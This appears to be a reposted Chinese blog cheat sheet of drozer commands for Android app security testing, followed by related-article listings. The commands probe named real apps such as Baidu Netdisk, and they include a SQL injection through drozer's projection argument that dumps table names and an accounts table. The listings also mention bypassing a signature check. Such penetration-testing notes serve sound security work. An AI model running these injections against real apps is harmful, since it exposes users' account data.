drozer使用总结

最新推荐文章于 2025-08-18 22:47:43 发布
最新推荐文章于 2025-08-18 22:47:43 发布
阅读量84 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java 数据库 网络
原文链接:http://www.cnblogs.com/littlefishxu/p/3969209.html
本文介绍如何利用drozer工具进行安卓应用的安全测试,详细展示了通过一系列命令检查应用程序的包名、信息、暴露的服务及内容提供者等,帮助开发者评估应用的安全状况。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

adb forward tcp:31415 tcp:31415

drozer console connect

run app.package.list -f baidu      查看包名
run app.package.info -a com.baidu.netdisk      查看包信息
run app.package.attacksurface com.baidu.netdisk      查看那些信息(包括activity、brodcast、content providers、services)被暴露
run app.activity.info -a com.baidu.netdisk          查看有那些activity被暴露
run app.activity.start --component com.baidu.netdisk com.baidu.netdisk.ui.Navigate     启动某个组件

run scanner.provider.finduris -a com.baidu.netdisk     扫描provider暴露的URI
run app.provider.query ontent://com.baidu.pcs.sso.providers.acoountprovider/accountInfo --vertical       获取信息
run scanner.provider.injection -a com.baidu.netdisk     扫描可以被注入的provider
run scanner.provider.traversal -a com.baidu.netdisk     扫描可以被遍历的provider

run app.service.info -a com.baidu.netdisk     被暴露的service

run app.provider.query content://com.vodone.caibo.sqlite.provider/accounts/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"     获取数据表
--projection "* FROM accounts;--"     (接上条)获取表accounts的内容


出现java错误时,在
示例:


示例:


转载于:https://www.cnblogs.com/littlefishxu/p/3969209.html

模拟器中安装和使用Drozer总结
SunJ3t的菠萝屋
08-09 635
最近在做Android渗透测试的学习,需要测试基础项,其中需要用到的一个很重要的软件的就是Drozer,简称dz,这里对用模拟器成功安装Drozer做一个总结。 1. 环境 JDK+Windows10 2. 模拟器 这里我使用的是夜神模拟器,之前也用了雷电的模拟器,但是雷电的模拟器在测试安卓应用时经常卡死不知道什么原因。 附上夜神模拟器下载地址:https://www.yeshen.com/cn/...
Drozer的安装和使用教程(入门)
lmh666888的博客
07-07 4386
Drozer的安装和使用教程(入门)
android studio 真机调试_真机设备(android手机或android平板)测试的相关操作
weixin_39723102的博客
11-27 881
真机设备(android手机或android平板)测试的相关操作环境搭建好之后,如果需要接入真机进行测试,还需要以下几步操作:1.1.1 设备接入电脑的设置关于Android设备接入电脑,像应用宝或手机助手之类都有图片教程之类,类似下图:1.1.2 查看设备将手机用数据线连接到电脑,并授权USB 调试模式。查看连接的效果,在cmd 下运行命令:adb devices -l 查看UDID,如下图所示...
绕过百度云的签名认证
weixin_34025051的博客
06-05 294
用apktool 反编译出smali, 然后再打包回去时,因为不知道百度的签名,所以必须用另外的签名。 java -jar sign.jar .\baiduyun\dist\BaiduYun_7.12.1.apk 然而,百度的程序内部还是会认证签名,从而导致打包的程序不能运行。 跟踪smali文件,可以看到这段代码 .class public final Lcom/bai...
Drozer安全测试工具使用.doc
05-22
drozer环境安装 包括的环境准备的Microsoft Visual C++ 9.0,python2.7,dorzer pc端,手机端,JDK1.8安装包,配置,安装问题,启动方法,命令使用总结
Drozer一亲测------安全审计与攻击框架-------drozer全功能介绍之配置环境篇
xiaofannet2010的专栏
10-26 784
官方链接:https://labs.mwrinfosecurity.com/tools/drozer/ 【安装篇:我的优快云 http://blog.youkuaiyun.com/xiaofannet2010/article/details/78325740 ,安装就按照下面的装好了。】 【使用篇:我的优快云 http://blog.youkuaiyun.com/xiaofannet2010/article/
MacOS安装并使用Drozer总结
beyond702的专栏
10-09 3458
Drozer官网:https://labs.mwrinfosecurity.com/tools/drozer/ 1. 首先下载Drozer源码并编译安装: git clone https://github.com/mwrlabs/drozer/ cd drozer python setup.py build python setup.py install 但是上面命令中最后一条安装的
Drozer中文乱码解决办法.docx
05-10
Drozer 是一款功能强大的 Android 渗透测试工具,但是在使用时,可能会遇到中文乱码的问题。今天,我们将探讨 Drozer 中文乱码解决办法。 一、问题描述 在使用 Drozer 时,可能会遇到中文乱码的问题。例如,在...
Drozer 使用说明
lei7143的专栏
06-15 3386
1、安装JDK 、SDK、python ,并设置到环境变量 2、下载drozer 、下载 agent.apk https://labs.mwrinfosecurity.com/tools/drozer/ 3、安装drozer ,并将其加入python 路径 方法: python site-packages 下创建 .pth 文件 C:\Python27\Lib\site-packag...
drozer-Android安全测试基本使用教程(Windows10)
热门推荐
jianglianye21的博客
06-12 1万+
drozer官网地址:https://labs.mwrinfosecurity.com/tools/drozer/ 一、安装 1.1 环境要求 (1)jdk1.6+ (2)python2.7 (3)android sdk 确保配置了adb、java环境变量 1.2 Window10安装drozer 2、 下载drozer https://labs.mwrinfosecuri...
Drozer安装
dieman0446的博客
09-14 79
(1)JDK安装 http://www.cnblogs.com/linbc/p/4319509.html http://blog.youkuaiyun.com/qq_31988895/article/details/50110859 (2)Android SDK安装 https://developer.android.com/studio/install.html 转载于:h...
【跃迁之路】【726天】程序员高效学习方法论探索系列(实验阶段483-2019.2.16)...
weixin_34061042的博客
02-16 138
实验说明 从2017.10.6起,开启这个系列,目标只有一个:探索新的学习方法,实现跃迁式成长 实验期2年(2017.10.06 - 2019.10.06) 我将以自己为实验对象。 我将开源我的学习方法,方法不断更新迭代,全程记录分享 实验结束后我将请5位以上资深程序员判断我是否达成目标。 本实验旨在探索新方法,所涉及的学习方法未经科学...
vc2008程序发布指南
极乐净土
03-08 1172
vc2008开发的程序的发布方式可以有5种方式: 1. 采用静态链接到crt和MFC. 只要你拥有组成程序的所有源代码,你就可以采用这种方式,    这种方式除了程序变大一点,好处多多:     1) 不必重新发布vc2008基础库vcredist_x86.exe(安装到WinSxS).    2) 不必产生,嵌入manifest.    3) 也不把vc2008基础库放在程序所在目录.
《移动安全》(6)使用drozer检测四大组件(下)
午夜安全
10-05 5411
《移动安全》(6)使用drozer检测四大组件(下) 在drozer console中直接使用help查看;然后进一步使用help command可查看各命令更具体的使用方法。通过输入安装包的部分关键字查找包全称 run app.package.list -f 安装包部分关键字run app.package.list -f demo使用app.package.info模块查看apk基本信息run app.package.info -a ...
Java——琐碎知识点2
2401_88065518的博客
08-15 765
Java基础知识点:Java官方帮助文档、Scanner扫描器、快捷键、“==”做比较、获取代码运行时间、打印对象名时不会出现内存地址的类型、Arrays类常用方法、循环标号的使用、Lambda表达式、异常处理、Java浮点数的精度问题(BigDecimal)、DecimalFormat格式化数字工具、printf格式化输出
08.常见文本处理工具
最新发布
weixin_56408536的博客
08-18 629
查看二进制文件的不同。
JavaScript 核心基础:类型检测、DOM 操作与事件处理
热爱音乐和二次元!
08-15 1353
本文系统梳理 JavaScript 核心知识点,包括数据类型检测规则、遍历方式、DOM操作和事件处理。重点解析 typeof 运算符对不同数据类型的检测结果,数组与对象的遍历方法差异,以及使用 querySelector 获取元素的现代方案。同时详细讲解事件绑定的两种方式(onclick 覆盖 vs addEventListener 多播)和事件冒泡机制,帮助开发者构建扎实的 JS 基础,写出更健壮的代码。
Drozer渗透工具全面指南:安装、使用与模块详解
总结来说,Drozer User Guide是一份全面的指南,涵盖了从安装到实际使用,再到安全评估和模块管理的各个方面,对于任何希望深入研究Android安全或者进行安全测试的人来说,都是不可或缺的参考资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值